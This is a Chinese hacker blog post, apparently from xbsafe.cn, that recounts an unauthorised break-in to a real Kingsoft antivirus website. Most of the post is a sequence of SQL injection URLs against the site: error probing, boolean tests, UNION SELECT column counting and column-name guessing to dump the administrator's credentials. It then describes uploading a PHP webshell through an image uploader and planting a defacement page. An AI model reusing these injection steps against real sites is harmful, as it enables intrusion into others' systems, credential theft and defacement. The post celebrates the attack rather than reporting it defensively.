|
友情检测强大的金山毒霸公司!作者:寂寞黑夜
来源:www.xbsafe.cn
记得上次CCTV被黑.是一个SA注入点,而且大家很早就知道.只是不敢动而已,后来小波动了.这次金山也纯在这个注入漏洞.呵呵..
首先我看了下主页.一切都很正常.
于是点击新闻看看... 提交'
http://www.duba.com.hk/***ws.php?nid=00***00***'
出错了.从错误中可以得知.该页面存在注入.且站点使用mysql数据库
呵呵..sql语言好久没复习了..

然后在这个页面上在提交http://www.duba.com.hk/****.php?nid=00***00**** and 1=1
返回正常...
然后在提交http://www.duba.com.hk/n****s.php?nid=00***00****4 and 1=2
返回的页面不一样...确定金山安全公司的***.php这个页面存在注入漏洞...
于是立即打开google开始对他进行踩点,
好多信息.金山果然是国内大名鼎鼎的杀毒厂商..JB新闻真多.. 不管了 一个一个找
找到了一个奇怪的连接是鸟文的我点进去看...
http://www.duba.com.hk/founder/****.php?cng_region=1&nid=000****0000***
然后提交http://www.duba.com.hk/founder/****.php?cng_region=1&nid=000****0000***'
页面错误提示我
invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' at line 1
于是我在提交http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000****0000*** and 1=1
返回页面正常
提交http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000****0000*** and 1=2
页面是空的于是我决定就用这个注入点下手....
提交http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000****0000*** and 1=2 union select 1,2,3 from admin
发现页面提示我select查询语句错误

开始感觉奇怪了..管理员表根据我平时数据库设计俺就弄了一个3个列 难道还有其他的?
于是我再次提交了http://www.duba.com.hk/founder/****.php?cng_region=1&nid=00***00**** and 1=2 union select 1,2,3,4 from admin
呵呵..出来了.. 被我猜中了...页面爆出 3 4 列有东西...看来平时好好学习数据库设计还是有用的...

接下来就是提交:http://www.duba.com.hk/founder/****.php?cng_region=1&nid=000****0000*** and 1=2 union select 1,2,username,4 from admin 成功的爆出管理员用户名

那当然第4的位置应该是密码了...密码一般管理员都是用password,pas,pwd,等作为数据库列名 那我们就一个一个试吧
提交:http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000****0000*** and 1=2 union select 1,2,username,password from admin
列名不对:页面提示我:invalid query: Unknown column 'password' in 'field list'
那就用第二个吧pas:我们继续提交地址:http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000****0000*** and 1=2 union select 1,2,username,pas from admin
还是错的..晕死.. 继续试..发扬乌龟精神..
继续提交地址:http://www.duba.com.hk/founder/****.php?cng_region=1&nid=000****0000*** and 1=2 union select 1,2,username,pwd from admin
嘿嘿..搞定了..原来列名是pwd的..简写..
在已经有管理员账号密码了 登陆后台...

找了很久..才找到一个上次的地方...
图片的地方可以直接上次php的..成功的得到webshell
黑页地址:http://www.duba.com.hk/founder/images/product/p_help.html
呵呵...其实没什么技术含量..管理员疏忽了sql注入漏洞而已..但是小小漏洞危害大..
最后想和我交流的欢迎到www.xbsafe.cn 我的论坛ID是小道[s:150]
PS:
对安全人士来说 : 一招 致命,你防了吗?
对黑客人士来说 : 一招 致命,你会了吗?
技术是无罪的,快乐就在思考。
攻防是种哲学,输赢只在一招。 |
|